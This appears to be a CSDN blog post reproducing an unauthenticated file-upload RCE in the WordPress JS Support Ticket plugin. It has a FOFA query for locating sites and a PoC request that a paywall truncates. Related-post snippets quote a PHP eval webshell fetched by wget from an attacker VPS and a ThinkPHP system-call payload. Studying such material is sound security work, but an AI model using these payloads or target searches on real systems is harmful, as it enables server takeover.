WordPress JS Support Ticket插件 RCE漏洞复现

0xSecl

已于 2024-04-11 14:49:24 修改

阅读量637

点赞数 7

分类专栏：漏洞复现文章标签：安全 web安全

于 2024-04-11 14:49:14 首次发布

本文链接：https://blog.csdn.net/qq_41904294/article/details/137638782

版权

漏洞复现专栏收录该内容

966 篇文章 1588 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了WordPress的JS Support Ticket插件存在一个未经身份验证的远程代码执行（RCE）漏洞，攻击者可利用此漏洞上传恶意脚本并执行任意指令，获取服务器权限。复现环境中通过FOFA查询到相关部署，修复建议包括限制接口访问权限和升级到安全版本。

摘要由CSDN通过智能技术生成

0x01 产品简介

WordPress和WordPress plugin都是WordPress基金会的产品。JS Support Ticket是使用在其中的一套开源票务系统插件。

0x02 漏洞概述

WordPress中的JS Support Ticket插件存在未经上传漏洞，未经身份验证的攻击者可以上传恶意脚本的服务器，执行任意指令，从而获取服务器权限。

0x03 复现环境

FOFA：body="wp-content/plugins/js-support-ticket"

0x04 漏洞复现

PoC

POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host: your-ip
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, defl

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0xSecl

关注关注

7
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

订阅专栏

WordPress Bricks Builder RCE(CVE-2024-25600)

qq_67810151的博客

02-23

1396

Bricks Builder 小于等于1.9.6的版本存在远程代码执行漏洞，攻击者可以通过该漏洞远程执行任意代码，控制服务器。

wordpress js-support-ticket文件上传漏洞（含批量验证poc）

weixin_43567873的博客

04-02

334

wordpress js-support-ticket文件上传漏洞（含批量验证poc）

参与评论您还未登录，请先登录后发表或查看评论

Wordpress js-support-ticket文件上传漏洞

qq_39894062的博客

04-02

688

Wordpress js-support-ticket文件上传漏洞

域渗透PTT票据传递攻击(Pass the Ticket)

Longwaer

01-21

1988

通过笔记全方位讲解，加速学习了解PTT票据传递攻击的方法及原理，更好的去掌握黄金、白银票据生成。

WordPress-RCE-EXP

04-10

WordPress-RCE-EXP 影响版本漏洞编号：CVE-2016-10033 （基于） WordPress <= 4.7.1 PHPMailer < 5> <目标站存在的用户名> Python3 wp_rce_exp.py http://127.0.0.1/ admin 0x2漏洞利用出现 Test_blind_shell>>> 后，说明网站存在RCE漏洞有两种方式来漏洞利用一、写入Webshell 1.在vps上开web服务，在web目录下的test.txt文件中写入一句话 <?php @eval($_POST[test]); ?> 2.目标使用wget下载到web目录上 (注意vps需要用ip地址，前面不能加http://) Test_blind_shell>>>/usr/bin/wget --

WordPress＜=4.6 RCE(CVE-2016-10033)

jammny

10-24

640

前言 WordPress 是一种使用 PHP 语言开发的博客平台，用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统（CMS）来使用。漏洞详情 wordpress使用phpmailer组件进行重置密码邮件的发送，但是phpmailer < 5.2.18之前的版本存在命令注入漏洞，WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞，攻击

Wordpress GutenKit 插件远程文件写入致RCE漏洞复现(CVE-2024-9234)

最新发布

0xSec

10-16

805

Wordpress GutenKit 插件存在远程文件写入漏洞，未经身份验证的远程攻击者，可利用此漏洞远程加载远程文件上传至系统插件目录，写入后门，获取服务器权限，进而控制整个web服务器。

记一次Mailpress插件RCE漏洞复现

qq_42562304的博客

07-26

473

WordPressMailpressPlugin插件中，文件中iview()函数中subject参数未经过滤，直接拼接do_eval函数执行代码，而do_eval函数也未经任何过滤，导致远程代码执行漏洞。详情链接。

WordPress AI Engine 插件 文件上传致RCE漏洞复现(CVE-2023-51409)

0xSec

04-27

738

WordPress AI Engine 插件upload接口存在文件上传漏洞，未经身份验证的攻击者可利用此漏洞上传任意后门文件，执行恶意代码，获取服务器权限。

WordPress BuddyPress 越权漏洞RCE（CVE-2021-21389）

Biu_Biu_Bi的博客

07-15

1277

BuddyPress 是一个用于构建社区站点的开源 WordPress 插件。在 7.2.1 之前的 5.0.0 版本的 BuddyPress 中，非特权普通用户可以通过利用 REST API 成员端点中的问题来获得管理员权限。该漏洞已在 BuddyPress 7.2.1 中修复。插件的现有安装应更新到此版本以缓解问题。

WordPress BuddyPress 存在越权漏洞RCE（CVE-2021-21389）

xiaobai_20190815的博客

05-11

3743

一、漏洞描述 BuddyPress 是一个用于构建社区站点的开源 WordPress 插件。在 7.2.1 之前的 5.0.0 版本的 BuddyPress 中，非特权普通用户可以通过利用 REST API 成员端点中的问题来获得管理员权限。该漏洞已在 BuddyPress 7.2.1 中修复。插件的现有安装应更新到此版本以缓解问题二、影响版本 5.0.0 <BuddyPress< 7.2.1 三、漏洞环境 1、dockerhub拉镜像，docker pull hoangkien10

WordPress--mailpress RCE复现

ro4lsc的博客

03-16

7907

本文主要讲述了WordPress--mailpress RCE漏洞的复现，如有纰漏，请联系笔者修改，希望能对您有所帮助。

wordpress 4.6 RCE漏洞利用（CVE-2016-10033）

xiaobai_20190815的博客

04-08

5461

一、漏洞描述：当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload，即可进行远程命令执行二、影响版本 WordPress <= 4.6.0 PHPMailer < 5.2.18 三、漏洞搭建 vulhub下载，傻瓜式安装，然后漏洞在密码重置这个页面四、漏洞利用 1、抓包，构造POST /wp-login.p

WordPress Exploit-4-6 RCE CVE-2016-10033

公众号shadow sock7

05-07

1070

原文： https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html绕过过滤器To exploit the PHPMailer’s mail() injection vulnerability, an attacker would have to be able to append param

漏洞复现-wordpress RCE-CVE-2024-25600(1)，网络安全面试项目经验

m0_60666921的博客

04-07

1115

在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**④等保简介、等保规定、流程和规范。

漏洞复现-wordpress RCE-CVE-2024-25600

04-12

647

本人从事网路安全工作12年，曾在2个大厂工作过，安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过，对这个行业了解比较全面。最近遍览了各种网络安全类的文章，内容参差不齐，其中不伐有大佬倾力教学，也有各种不良机构浑水摸鱼，在收到几条私信，发现大家对一套完整的系统的网络安全从学习路线到学习资料，甚至是工具有着不小的需求。最后，我将这部分内容融会贯通成了一套282G的网络安全资料包，所有类目条理清晰，知识点层层递进，需要的小伙伴可以点击下方小卡片领取哦！

WordPress爆炸性0day，直接RCE！附POC

m0_52514790的博客

02-24

1889

2.漏洞路径为：/wp-json/bricks/v1/render_element，然后使用构造好的POC进行nonce的替换，直接进行命令执行，获取服务器敏感信息以及进行敏感操作。其中执行的命令可以根据自己的需要进行更改即可。1.首先访问存在WordPress Bricks Builder 插件的网站，然后右键查看网页源代码或者使用抓包工具抓取返回的数据包，直接搜索参数nonce，获取其参数值。

CVE-2024-25600 WordPress Bricks Builder RCE-漏洞分析研究

shelter1234567的博客

03-06

3052

CVE-2024-25600 是一个严重的（CVSS 评分 9.8）远程代码执行 (RCE) 漏洞，影响 WordPress 的 Bricks Builder 插件。成功利用此漏洞可能允许未经身份验证的攻击者在受影响的基于 WordPress 的网站上远程执行任意 PHP 代码。据报道，该漏洞已被广泛利用，包括尝试在易受攻击的服务器上安装基于 PHP 的恶意 Webshell。Bricks Builder 插件版本 1.9.6.1 或更高版本中已发布解决此漏洞的补丁。Bricks Builder官方。

thinkphp5.0.23rce漏洞复现

09-22

ThinkPHP 5.0.23版本之前存在一个远程代码执行（RCE）的漏洞。漏洞的形成原因是在获取method的方法中未正确处理方法名，导致攻击者可以调用Request类的任意方法并构造利用链，从而导致远程代码执行漏洞。具体的漏洞利用过程如下： 1. 访问靶机地址和端口号，进入首页。 2. 使用Burp抓包工具修改传参方式为POST，传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"，其中pwd是系统执行命令的参数。 3. 接着进行漏洞的复现过程，首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具，修改传参方式为POST，URL后接入/index.php?s=captch，传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮，尝试写入phpinfo。 7. 成功后，写入一句话木马，密码为aaa。 8. 进一步操作，可以上蚁剑。漏洞复现成功后，您可以参考这篇文章了解更多细节：[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问，欢迎提出。